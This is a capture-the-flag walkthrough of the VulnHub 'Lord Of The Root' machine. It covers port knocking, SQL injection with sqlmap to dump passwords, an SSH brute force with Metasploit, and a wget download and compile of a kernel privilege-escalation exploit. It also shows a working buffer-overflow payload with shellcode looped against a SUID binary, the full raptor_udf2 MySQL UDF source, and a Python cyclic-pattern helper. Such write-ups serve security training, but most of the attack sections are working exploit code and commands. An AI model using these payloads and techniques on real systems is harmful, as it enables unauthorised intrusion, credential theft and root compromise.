VulnHub machine walkthrough [Lord-Of-The-Root-1-0-1]

Name

Name: Lord Of The Root: 1.0.1
Release date: 23 September 2015

Download

  • Download: http://www.mediafire.com/download/m5tbx0dua05szjm/LordOfTheRoot.ova
  • Download (Mirror): https://download.vulnhub.com/lordoftheroot/LordOfTheRoot_1.0.1.ova
  • Download (Torrent): https://download.vulnhub.com/lordoftheroot/LordOfTheRoot_1.0.1.ova.torrent

Description

This machine was created to help others learn some basic CTF hacking techniques and tools. Its difficulty is very similar to what I encountered on the OSCP. It is a boot-to-root machine that needs no guest interaction. There are two intended privilege escalation methods.

  • 23/09/2015 == v1.0.1
  • 22/09/2015 == v1.0

If you have problems with VirtualBox, try the following:

  • Download LordOfTheRoot_1.0.1.ova (verify the file hash).
  • Download and install VMware ovftool.
  • Convert the OVA to OVF with ovftool.
  • Edit the OVF with a text editor: replace every reference to "ElementName" with "Caption", and the single reference to "vmware.sata.ahci" with "AHCI".
  • Save the OVF and delete the .mf (manifest) file. Otherwise the import fails with an error that the SHA does not match the OVF (editing the hash was tried without success).
  • Import the OVF file; it should now work.

Information gathering

Start with nmap

root@kali:~# nmap -sn -v 192.168.56.0/24
Nmap scan report for 192.168.56.113
Host is up (0.00022s latency).
MAC Address: 08:00:27:0B:D4:69 (Oracle VirtualBox virtual NIC)
PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)

Try connecting over SSH

root@kali:~# ssh 192.168.56.113
The authenticity of host '192.168.56.113 (192.168.56.113)' can't be established.
ECDSA key fingerprint is SHA256:XzDLUMxo8ifHi4SciYJYj702X3PfFwaXyKOS07b6xd8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.113' (ECDSA) to the list of known hosts.

[ASCII-art banner: "Knock Friend To Enter"]
Easy as 1,2,3
Enter passphrase for key '/root/.ssh/id_rsa':
root@192.168.56.113's password:

When connecting over SSH, the banner says "Knock Friend To Enter" and "Easy as 1,2,3", then asks for a password we do not have. This hints at port knocking. Let's try it:

root@kali:~# nmap -r -Pn -p 1,2,3 192.168.56.113 -v
PORT STATE SERVICE
1/tcp filtered tcpmux
2/tcp filtered compressnet
3/tcp filtered compressnet
MAC Address: 08:00:27:0B:D4:69 (Oracle VirtualBox virtual NIC)

Now run the nmap scan again; hopefully this time more than one port shows up.

root@kali:~# nmap -p- -A -v 192.168.56.113 --min-rate=10000
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
| 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
|_ 256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519)
1337/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

As shown, compared with the earlier scan there is one more open port, 1337, running an HTTP service. This is what we want, since port 80 is not open by default. Let's open the target IP on this port.

http://192.168.56.113:1337/

As shown above, the page contains only an image, and its source was checked without finding any clues. There is usually a chance that a robots.txt file sits in the web directory, so when testing any system you should always check robots.txt. Requesting 192.168.56.113:1337/robots.txt opens a new page showing the following image.

Getting a shell

After that, we looked at its source and found a base64-encoded value.

<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>

Decoding it

root@kali:~# echo "THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh" | base64 -d
Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!
root@kali:~# echo "Lzk3ODM0NTIxMC9pbmRleC5waHA=" | base64 -d
/978345210/index.php

Visit the following URL

http://192.168.56.113:1337/978345210/index.php

Now there is a login form. Let's try to get in with the help of SQL injection, using sqlmap.
Since we do not know the exact username and password, we point sqlmap at the login form and retrieve the database name and login credentials with the following command.

Time-based blind injection, so slow... Finally, it shows the usernames and passwords.

root@kali:~# sqlmap -u "http://192.168.56.113:1337/978345210/index.php" --forms -D Webapp -T Users --dump --batch
Database: Webapp
Table: Users
[5 entries]
+----+------------------+----------+
| id | password         | username |
+----+------------------+----------+
| 1  | iwilltakethering | frodo    |
| 2  | MyPreciousR00t   | smeagol  |
| 3  | AndMySword       | aragorn  |
| 4  | AndMyBow         | legolas  |
| 5  | AndMyAxe         | gimli    |
+----+------------------+----------+

Save all these usernames and passwords in two separate text files and use them for an SSH login brute force. To run the attack, open a terminal on Kali, start Metasploit by typing msfdb run, and then type the following:

root@kali:~/vulnhub/lordoftheroot# msfdb run
[+] Starting database


[Metasploit ASCII-art banner]

=[ metasploit v5.0.69-dev ]
+ -- --=[ 1959 exploits - 1094 auxiliary - 336 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]

msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.56.113
rhosts => 192.168.56.113
msf5 auxiliary(scanner/ssh/ssh_login) > set user_file /root/vulnhub/lordoftheroot/user.txt
user_file => /root/vulnhub/lordoftheroot/user.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file /root/vulnhub/lordoftheroot/pass.txt
pass_file => /root/vulnhub/lordoftheroot/pass.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set stop_on_success true
stop_on_success => true
msf5 auxiliary(scanner/ssh/ssh_login) > exploit

[+] 192.168.56.113:22 - Success: 'smeagol:MyPreciousR00t' ''
[*] Command shell session 1 opened (192.168.56.102:43037 -> 192.168.56.113:22) at 2020-01-25 12:36:48 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We get a valid username and password

smeagol/MyPreciousR00t

Metasploit also gives us the added benefit of a remote command shell on the target system. Now we start working toward root. To get a proper TTY shell, type the following Python one-liner:

msf5 auxiliary(scanner/ssh/ssh_login) > sessions 1
[*] Starting interaction with 1...

Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)

* Documentation: https://help.ubuntu.com/

[ASCII-art banner: "Welcome Friend"]
python -c 'import pty;pty.spawn("/bin/bash")'
smeagol@LordOfTheRoot:~$ id
id
uid=1000(smeagol) gid=1000(smeagol) groups=1000(smeagol)
smeagol@LordOfTheRoot:~$ whoami
whoami
smeagol
smeagol@LordOfTheRoot:~$

Privilege escalation 1: searching for an exploit

From the shell, type the following command to identify the system version:

smeagol@LordOfTheRoot:~$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.3 LTS
Release: 14.04
Codename: trusty

The version is 14.04, and luckily there is an exploit for it. In the Kali terminal, search for exploits as follows:

root@kali:~# searchsploit ubuntu 14.04
---------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
---------------------------------------------------------------------------------- ----------------------------------------
Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation | exploits/linux/local/37088.c
Apport 2.14.1 (Ubuntu 14.04.2) - Local Privilege Escalation | exploits/linux/local/36782.sh
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / | exploits/linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ld | exploits/linux_x86/local/42276.c
Linux Kernel (Ubuntu 14.04.3) - 'perf_event_open()' Can Race with execve() (Acces | exploits/linux/local/39771.txt
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local P | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local P | exploits/linux/local/37293.txt
Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SM | exploits/linux/local/41999.txt
Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation | exploits/linux/local/39166.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privi | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race C | exploits/linux/local/47170.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escal | exploits/linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - L | exploits/linux/local/47169.c
NetKit FTP Client (Ubuntu 14.04) - Crash/Denial of Service (PoC) | exploits/linux/dos/37777.txt
Ubuntu 14.04/15.10 - User Namespace Overlayfs Xattr SetGID Privilege Escalation | exploits/linux/local/41762.txt
WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow | exploits/linux/local/44204.md
usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Local Privilege Escalation | exploits/linux/local/36820.txt
---------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Pick the exploit below; of course you can try the others yourself, I will skip them here to save time...

Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation  | exploits/linux/local/39166.c

Copy the exploit to the current directory with cp, then start a Python HTTP server to transfer it to the target machine.

root@kali:~/vulnhub/lordoftheroot# cp /usr/share/exploitdb/exploits/linux/local/39166.c .
root@kali:~/vulnhub/lordoftheroot# ls
39166.c pass.txt user.txt
root@kali:~/vulnhub/lordoftheroot# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

Compile the exploit in the shell, make it executable, and run the resulting binary. As shown, the privilege escalation succeeds; very simple.

smeagol@LordOfTheRoot:~$ wget http://192.168.56.102:8000/39166.c
wget http://192.168.56.102:8000/39166.c
--2020-01-25 18:52:13-- http://192.168.56.102:8000/39166.c
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2789 (2.7K) [text/plain]
Saving to: ‘39166.c’

100%[======================================>] 2,789 --.-K/s in 0s

2020-01-25 18:52:13 (575 MB/s) - ‘39166.c’ saved [2789/2789]

smeagol@LordOfTheRoot:~$ gcc 39166.c -o exp
gcc 39166.c -o exp
smeagol@LordOfTheRoot:~$ chmod 777 exp
chmod 777 exp
smeagol@LordOfTheRoot:~$ ./exp
./exp
root@LordOfTheRoot:~# id
id
uid=0(root) gid=1000(smeagol) groups=0(root),1000(smeagol)
root@LordOfTheRoot:~# whoami
whoami
root

Finally, find the flag; challenge complete.

root@LordOfTheRoot:/root# cat Flag.txt
cat Flag.txt
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf

Privilege escalation 2: exploiting a root-owned SUID binary

Navigating to the filesystem root directory, there is a directory named "SECRET". It contains three "doors", each holding a file named "file":

smeagol@LordOfTheRoot:/$ cd SECRET
cd SECRET
smeagol@LordOfTheRoot:/SECRET$ ls
ls
door1 door2 door3
smeagol@LordOfTheRoot:/SECRET$ ls -lahR
ls -lahR
.:
total 20K
drwxr-xr-x 5 root root 4.0K Sep 22 2015 .
drwxr-xr-x 23 root root 4.0K Sep 22 2015 ..
drwxr-xr-x 2 root root 4.0K Jan 25 19:15 door1
drwxr-xr-x 2 root root 4.0K Jan 25 19:15 door2
drwxr-xr-x 2 root root 4.0K Jan 25 19:15 door3

./door1:
total 16K
drwxr-xr-x 2 root root 4.0K Jan 25 19:15 .
drwxr-xr-x 5 root root 4.0K Sep 22 2015 ..
-rwsr-xr-x 1 root root 7.2K Sep 17 2015 file

./door2:
total 16K
drwxr-xr-x 2 root root 4.0K Jan 25 19:15 .
drwxr-xr-x 5 root root 4.0K Sep 22 2015 ..
-rwsr-xr-x 1 root root 7.2K Sep 17 2015 file

./door3:
total 16K
drwxr-xr-x 2 root root 4.0K Jan 25 19:15 .
drwxr-xr-x 5 root root 4.0K Sep 22 2015 ..
-rwsr-xr-x 1 root root 5.1K Sep 22 2015 file

These files have the SUID bit set and are owned by root! If that can be exploited, it may be the ticket to root. Checking each file shows that they are all binary executables, but one of the three has a different sha1 hash:

smeagol@LordOfTheRoot:/SECRET$ file door1/file door2/file door3/file
file door1/file door2/file door3/file
door1/file: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=364b5cbb85546e36256039ce4599eee471bfbf86, not stripped
door2/file: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=9e50c7cacaf5cc2c78214c81f110c88e61ad0c10, not stripped
door3/file: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=364b5cbb85546e36256039ce4599eee471bfbf86, not stripped

From past experience, the binary that differs from the other two is the best one to use. Also, after a set amount of time the binaries are switched to a different door. To deal with this, copy the file to smeagol's Desktop for more consistent testing:

smeagol@LordOfTheRoot:/SECRET$ cp door2/file /home/smeagol/Desktop/
cp door2/file /home/smeagol/Desktop/
smeagol@LordOfTheRoot:/SECRET$ ls /home/smeagol/Desktop/
ls /home/smeagol/Desktop/
file

Running the file shows that it asks the user for an input string:

smeagol@LordOfTheRoot:~/Desktop$ ./file
./file
Syntax: ./file <input string>
smeagol@LordOfTheRoot:~/Desktop$ ./file A
./file A

Since this is a VulnHub image, we can assume the file is vulnerable to a buffer overflow. Use Python to fuzz the file and confirm:

smeagol@LordOfTheRoot:~/Desktop$ ./file $(python -c 'print "A" * 100')
./file $(python -c 'print "A" * 100')
smeagol@LordOfTheRoot:~/Desktop$ ./file $(python -c 'print "A" * 200')
./file $(python -c 'print "A" * 200')
Segmentation fault (core dumped)
smeagol@LordOfTheRoot:~/Desktop$ ./file $(python -c 'print "A" * 150')
./file $(python -c 'print "A" * 150')
smeagol@LordOfTheRoot:~/Desktop$ ./file $(python -c 'print "A" * 175')
./file $(python -c 'print "A" * 175')
Segmentation fault (core dumped)
smeagol@LordOfTheRoot:~/Desktop$ ./file $(python -c 'print "A" * 160')
./file $(python -c 'print "A" * 160')

Note that there is a segmentation fault when the file receives about 175 characters.
To get a more accurate count, use the built-in Ruby script from Metasploit to create a 175-character pattern string:

root@kali:~# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 175
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7A

Take this string, open the binary in GDB, and run it with the string as the argument:

smeagol@LordOfTheRoot:~/Desktop$ gdb -q ./file
gdb -q ./file
Reading symbols from ./file...(no debugging symbols found)...done.
(gdb) run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7A
Starting program: /home/smeagol/Desktop/file Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7A

Program received signal SIGSEGV, Segmentation fault.
0x41376641 in ?? ()

As expected, we get a segfault at 0x41376641. We can feed this value back into the Metasploit script to see at how many characters it lands:

root@kali:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 41376641
[*] Exact match at offset 171
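As an added example that is not part of the original writeup, here is the pattern logic behind pattern_create.rb and pattern_offset.rb in Python: it reproduces the 175-character pattern above and the offset 171 from the crash value 0x41376641, and `little_endian` shows the byte reversal the writeup applies later to the ESP address 0xbfffee70. The function names are my own.

```python
import string
import struct

# Character sets in the order pattern_create.rb cycles through them:
# the uppercase letter changes slowest, the digit fastest.
UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def pattern_create(length):
    """Build the cyclic 'Aa0Aa1Aa2...' pattern, cut to `length` characters.

    Every 4-byte window of the pattern occurs only once, which is what
    lets a value read out of a crashed register be mapped back to an
    offset in the input.
    """
    chunks = []
    produced = 0
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                chunks.append(u + l + d)
                produced += 3
                if produced >= length:
                    return "".join(chunks)[:length]
    raise ValueError("requested length exceeds the unique pattern space")


def needle_from_query(query):
    """Turn a pattern_offset-style query into the text to search for.

    An int or an 8-hex-digit string is treated as a 32-bit register value
    from a little-endian x86 crash: EIP = 0x41376641 sits in memory as the
    bytes 41 66 37 41, i.e. the text 'Af7A'. Anything else is used as
    literal text.
    """
    if isinstance(query, int):
        return struct.pack("<I", query).decode("latin-1")
    if len(query) == 8 and all(c in string.hexdigits for c in query):
        return struct.pack("<I", int(query, 16)).decode("latin-1")
    return query


def pattern_offset(query, length):
    """Offset of the crash value inside pattern_create(length), or -1."""
    return pattern_create(length).find(needle_from_query(query))


def little_endian(address):
    """Pack a 32-bit address the way it must be written into the payload.

    0xbfffee70 becomes the byte sequence 70 ee ff bf, which is why the
    ESP value in the writeup is written 'in reverse'.
    """
    return struct.pack("<I", address)


if __name__ == "__main__":
    print(pattern_create(175))              # ends with ...Af5Af6Af7A
    print(pattern_offset(0x41376641, 175))  # 171, as pattern_offset.rb reported
    print(pattern_offset("41376641", 175))  # same query as '-q 41376641'
    print(little_endian(0xbfffee70))        # bytes 70 ee ff bf
```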

Now we know the binary segfaults at character 171, so we can update the fuzz to confirm. In GDB, send 171 A characters, 4 B characters, and the rest C.

smeagol@LordOfTheRoot:~/Desktop$ gdb -q ./file
gdb -q ./file
Reading symbols from ./file...(no debugging symbols found)...done.
(gdb) run $(python -c 'print "A" * 171 + "B" * 4 + "C" * 50')
run $(python -c 'print "A" * 171 + "B" * 4 + "C" * 50')
Starting program: /home/smeagol/Desktop/file $(python -c 'print "A" * 171 + "B" * 4 + "C" * 50')

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) info r
info r
eax 0x0 0
ecx 0xbffffdd0 -1073742384
edx 0xbffffb54 -1073743020
ebx 0xb7fc0000 -1208221696
esp 0xbffffb30 0xbffffb30
ebp 0x41414141 0x41414141
esi 0x0 0
edi 0x0 0
eip 0x42424242 0x42424242
eflags 0x10202 [ IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51

As shown above, checking the registers reveals that EIP is now overwritten with 0x42424242, which is "BBBB" in hex. We control EIP! Further enumeration tells me that ASLR is also enabled:

smeagol@LordOfTheRoot:~/Desktop$ cat /proc/sys/kernel/randomize_va_space
cat /proc/sys/kernel/randomize_va_space
2

With ASLR enabled, the address space is randomized. In addition, there is no usable JMP ESP instruction in the program. That makes it impossible to hardcode an EIP address that points at the shellcode.

However, my idea is that if the exploit is run in a loop, it may be possible to "guess", or better, get "lucky" with the EIP address and land in the shellcode. For that, a large NOP sled needs to be added to the exploit, so that if EIP lands anywhere in it the program slides down into my shellcode.

Run the payload again, this time with a larger NOP sled of 2000 bytes:

smeagol@LordOfTheRoot:~/Desktop$ gdb -q ./file
gdb -q ./file
Reading symbols from ./file...(no debugging symbols found)...done.
(gdb) run $(python -c 'print "A" * 171 + "B" * 4 + "\x90" * 2000')
run $(python -c 'print "A" * 171 + "B" * 4 + "\x90" * 2000')
Starting program: /home/smeagol/Desktop/file $(python -c 'print "A" * 171 + "B" * 4 + "\x90" * 2000')

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/s $esp
x/s $esp
0xbfffee70: '\220' <repeats 200 times>...

So we still control EIP, and ESP appears to point elsewhere, at 0xbfffee70, which will be used as the EIP value. The shellcode also has to be included. A very common shellcode that spawns a shell is:

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80

Test the payload in the current GDB session to confirm the exploit works:

(gdb) run $(python -c 'print "A" * 171 + "\x70\xee\xff\xbf" + "\x90" * 2000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/file $(python -c 'print "A" * 171 + "\x70\xee\xff\xbf" + "\x90" * 2000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')
process 30271 is executing new program: /bin/dash
$ id
uid=1000(smeagol) gid=1000(smeagol) groups=1000(smeagol)
$ whoami
smeagol

Excellent! A shell is spawned. However, it runs as smeagol rather than root, because this is only the copy of the file I made. Also note that my EIP address "\x70\xee\xff\xbf"
is written in reverse because of little-endianness.

Now that I know my exploit works, it is time to loop it against the real target. The following script does that:

for a in {1..1000}; do ./file $(python -c 'print "A" * 171 + "\x70\xee\xff\xbf" + "\x90" * 2000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"'); done

With the exploit ready, go back to the /SECRET/ directory, find the right file, and run the script:

smeagol@LordOfTheRoot:/SECRET$ file door1/file door2/file door3/file
door1/file: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=364b5cbb85546e36256039ce4599eee471bfbf86, not stripped
door2/file: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=364b5cbb85546e36256039ce4599eee471bfbf86, not stripped
door3/file: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=9e50c7cacaf5cc2c78214c81f110c88e61ad0c10, not stripped

Run the command below; the privilege escalation succeeds as shown...

for a in {1..1000}; do /SECRET/door3/file $(python -c 'print "A" * 171 + "\x70\xee\xff\xbf" + "\x90" * 2000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"'); done
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
# id
uid=1000(smeagol) gid=1000(smeagol) euid=0(root) groups=0(root),1000(smeagol)
# whoami
root

Read the flag

# cd /root
# ls
Flag.txt buf buf.c other other.c switcher.py
# cat Flag.txt
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf

Privilege escalation 3: MySQL UDF

Use sqlmap to dump the MySQL usernames and password hashes; the earlier steps are omitted

root@kali:~# sqlmap -u http://192.168.56.113:1337/978345210/index.php --forms --batch -D mysql -T user --dump
root | <blank> | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F |
root | <blank> | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F |
debian-sys-maint | <blank> | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F |
root | <blank> | *A55A9B9049F69BC2768C9284615361DFBD580B34 |
root | <blank> | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F |

Cracking the hash

*4DD56158ACDBA81BFE3FF9D3D7375231596CE10F

gives darkshadow.
Then connect over SSH first with the earlier account and password.

Use searchsploit to find a MySQL UDF privilege escalation exploit

root@kali:~# searchsploit User-Defined Function
---------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
---------------------------------------------------------------------------------- ----------------------------------------
Microsoft Edge Chakra JIT - Op_MaxInAnArray and Op_MinInAnArray can Explicitly ca | exploits/windows/dos/43466.js
MySQL 4.0.17 (Linux) - User-Defined Function (UDF) Dynamic Library (1) | exploits/linux/local/1181.c
MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2) | exploits/linux/local/1518.c
MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution | exploits/windows/remote/3274.txt
---------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~# cat /usr/share/exploitdb/exploits/linux/local/1518.c
/*
* $Id: raptor_udf2.c,v 1.1 2006/01/18 17:58:54 raptor Exp $
*
* raptor_udf2.c - dynamic library for do_system() MySQL UDF
* Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* This is an helper dynamic library for local privilege escalation through
* MySQL run with root privileges (very bad idea!), slightly modified to work
* with newer versions of the open-source database. Tested on MySQL 4.1.14.
*
* See also: http://www.0xdeadbeef.info/exploits/raptor_udf.c
*
* Starting from MySQL 4.1.10a and MySQL 4.0.24, newer releases include fixes
* for the security vulnerabilities in the handling of User Defined Functions
* (UDFs) reported by Stefano Di Paola <stefano.dipaola@wisec.it>. For further
* details, please refer to:
*
* http://dev.mysql.com/doc/refman/5.0/en/udf-security.html
* http://www.wisec.it/vulns.php?page=4
* http://www.wisec.it/vulns.php?page=5
* http://www.wisec.it/vulns.php?page=6
*
* "UDFs should have at least one symbol defined in addition to the xxx symbol
* that corresponds to the main xxx() function. These auxiliary symbols
* correspond to the xxx_init(), xxx_deinit(), xxx_reset(), xxx_clear(), and
* xxx_add() functions". -- User Defined Functions Security Precautions
*
* Usage:
* $ id
* uid=500(raptor) gid=500(raptor) groups=500(raptor)
* $ gcc -g -c raptor_udf2.c
* $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
* $ mysql -u root -p
* Enter password:
* [...]
* mysql> use mysql;
* mysql> create table foo(line blob);
* mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
* mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
* mysql> create function do_system returns integer soname 'raptor_udf2.so';
* mysql> select * from mysql.func;
* +-----------+-----+----------------+----------+
* | name | ret | dl | type |
* +-----------+-----+----------------+----------+
* | do_system | 2 | raptor_udf2.so | function |
* +-----------+-----+----------------+----------+
* mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
* mysql> \! sh
* sh-2.05b$ cat /tmp/out
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* [...]
*
* E-DB Note: Keep an eye on https://github.com/mysqludf/lib_mysqludf_sys
*
*/

#include <stdio.h>
#include <stdlib.h>

enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args {
    unsigned int        arg_count;      // number of arguments
    enum Item_result    *arg_type;      // pointer to item_result
    char                **args;         // pointer to arguments
    unsigned long       *lengths;       // length of string args
    char                *maybe_null;    // 1 for maybe_null args
} UDF_ARGS;

typedef struct st_udf_init {
    char                maybe_null;     // 1 if func can return NULL
    unsigned int        decimals;       // for real functions
    unsigned long       max_length;     // for string functions
    char                *ptr;           // free ptr for func data
    char                const_item;     // 0 if result is constant
} UDF_INIT;

int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
    if (args->arg_count != 1)
        return(0);

    system(args->args[0]);

    return(0);
}

char do_system_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
    return(0);
}

// milw0rm.com [2006-02-20]

Save the code below as raptor_udf2.c

#include <stdio.h>
#include <stdlib.h>

enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args {
    unsigned int        arg_count;      // number of arguments
    enum Item_result    *arg_type;      // pointer to item_result
    char                **args;         // pointer to arguments
    unsigned long       *lengths;       // length of string args
    char                *maybe_null;    // 1 for maybe_null args
} UDF_ARGS;

typedef struct st_udf_init {
    char                maybe_null;     // 1 if func can return NULL
    unsigned int        decimals;       // for real functions
    unsigned long       max_length;     // for string functions
    char                *ptr;           // free ptr for func data
    char                const_item;     // 0 if result is constant
} UDF_INIT;

int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
    if (args->arg_count != 1)
        return(0);

    system(args->args[0]);

    return(0);
}

